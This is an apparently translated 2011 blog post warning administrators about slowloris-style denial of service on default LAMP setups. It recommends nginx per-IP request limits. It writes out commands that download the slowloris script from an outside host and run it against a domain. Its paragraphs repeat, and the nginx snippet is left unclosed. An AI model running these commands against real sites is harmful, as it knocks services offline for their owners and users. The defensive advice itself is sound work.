July 31, 2011 at 12:06Children's HTTP DOS
Often, administrators configure LAMP out of the box. For homepages and test benches, this is not a big deal.
Full-fledged DDOS is not the cheapest pleasure for an attacker, and if your portal is ordered, then resources must be found to protect against attack.
Children's DOS is much more dangerous, since anyone can carry out such an attack. Vulnerabilities are affected by all popular Web servers in the initial configuration with empty firewall rules and applies to corporate portals, dedicated servers, VPS - everything that is delivered but not configured. Mass hosting, as a rule, does not get sick with childhood diseases.
For Debian-like systems, these are 3 commands:
If you have not already done so, put nginx on the frontend. Not only does it work faster with files and speed up the return of statics, but it also has tremendous opportunities for the administrator, which Sysoev sometimes talks about in the newsletter.
Implementation of a limit on the number of requests to dynamic pages from one IP.
Allowed 10 requests per second from one IP with possible peaks up to 30 requests. Young talents can test your resource for strength at the most inopportune moment. For example, when you are on vacation. Do not put the protection in a long drawer.
Full-fledged DDOS is not the cheapest pleasure for an attacker, and if your portal is ordered, then resources must be found to protect against attack.
Children's DOS is much more dangerous, since anyone can carry out such an attack. Vulnerabilities are affected by all popular Web servers in the initial configuration with empty firewall rules and applies to corporate portals, dedicated servers, VPS - everything that is delivered but not configured. Mass hosting, as a rule, does not get sick with childhood diseases.
For Debian-like systems, these are 3 commands:
wget ha.ckers.org/slowloris/slowloris.pl
aptitude install libio-socket-ssl-perl
./slowloris.pl -dns domain.ruIf you have not already done so, put nginx on the frontend. Not only does it work faster with files and speed up the return of statics, but it also has tremendous opportunities for the administrator, which Sysoev sometimes talks about in the newsletter.
Implementation of a limit on the number of requests to dynamic pages from one IP.
Allowed 10 requests per second from one IP with possible peaks up to 30 requests. Young talents can test your resource for strength at the most inopportune moment. For example, when you are on vacation. Do not put the protection in a long drawer.
limit_req_zone $binary_remote_addr zone=lphp:10m rate=10r/s;
location / {
limit_req zone=lphp burst=30 nodelay;